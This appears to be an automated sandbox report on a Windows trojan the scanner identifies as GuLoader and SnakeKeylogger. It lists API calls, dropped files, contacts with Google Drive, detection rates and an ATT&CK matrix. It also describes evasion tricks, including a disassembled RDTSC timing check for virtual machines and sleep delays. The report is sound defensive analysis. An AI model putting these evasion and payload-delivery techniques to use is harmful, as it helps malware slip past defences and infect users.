      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52239 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52241 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52243 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52245 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52249 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:52250 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52253 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52255 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52263 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52267 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52271 version: TLS 1.2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_0040335A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_00404B6E8_2_00404B6E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040659D8_2_0040659D
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: String function: 00402B3A appears 51 times
      Source: fTSt7dc60O.exe, 00000000.00000000.1246875109.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs fTSt7dc60O.exe
      Source: fTSt7dc60O.exe, 00000008.00000000.1363150047.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs fTSt7dc60O.exe
      Source: fTSt7dc60O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsd9393.tmpJump to behavior
      Source: fTSt7dc60O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: fTSt7dc60O.exeVirustotal: Detection: 77%
      Source: fTSt7dc60O.exeReversingLabs: Detection: 66%
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile read: C:\Users\user\Desktop\fTSt7dc60O.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: fTSt7dc60O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.1367001967.00000000055DB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2484621112.000000000219B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI/Special instruction interceptor: Address: 59A08B6
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI/Special instruction interceptor: Address: 25608B6
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeRDTSC instruction interceptor: First address: 595C57D second address: 595C57D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF01474E232h 0x00000006 push edi 0x00000007 mov edi, 000000AEh 0x0000000c cmp edi, 1E8A5BDCh 0x00000012 jg 00007FF014793119h 0x00000018 pop edi 0x00000019 cmp dl, 0000006Eh 0x0000001c inc ebp 0x0000001d inc ebx 0x0000001e test cl, al 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeRDTSC instruction interceptor: First address: 251C57D second address: 251C57D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF014EF2832h 0x00000006 push edi 0x00000007 mov edi, 000000AEh 0x0000000c cmp edi, 1E8A5BDCh 0x00000012 jg 00007FF014F37719h 0x00000018 pop edi 0x00000019 cmp dl, 0000006Eh 0x0000001c inc ebp 0x0000001d inc ebx 0x0000001e test cl, al 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fTSt7dc60O.exe TID: 1836Thread sleep count: 43 > 30Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exe TID: 1836Thread sleep time: -430000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_00402770 FindFirstFileW,8_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI call chain: ExitProcess graph end nodegraph_0-4755
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI call chain: ExitProcess graph end nodegraph_0-4756
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      fTSt7dc60O.exe77%VirustotalBrowse
      fTSt7dc60O.exe67%ReversingLabsWin32.Trojan.SnakeKeylogger

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.google.comuI(0%Avira URL Cloudsafe
      https://drive.go0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.18.14
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.186.161
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comfTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://translate.google.com/translate_a/element.jsfTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1478904188.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1491048101.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1615874421.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1627045021.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1686747969.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1502459793.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1479093375.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1570023481.0000000007236000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.00000000071F8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://www.google.comuI(fTSt7dc60O.exe, 00000008.00000003.1615859431.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1710476317.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767155103.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1721714871.000000000721F000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.usercontent.google.com/wAfTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.usercontent.google.com/$fTSt7dc60O.exe, 00000008.00000003.2171579304.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.usercontent.google.com/fTSt7dc60O.exe, 00000008.00000003.1627045021.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1686747969.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1502459793.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071C3000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767155103.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071C3000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1721714871.000000000721F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://apis.google.comfTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorErrorfTSt7dc60O.exe, 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp, fTSt7dc60O.exe, 00000000.00000000.1246847605.0000000000409000.00000008.00000001.01000000.00000003.sdmp, fTSt7dc60O.exe, 00000008.00000000.1363121639.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                          		high
                          https://drive.usercontent.google.com/$xefTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.gofTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/ificatefTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
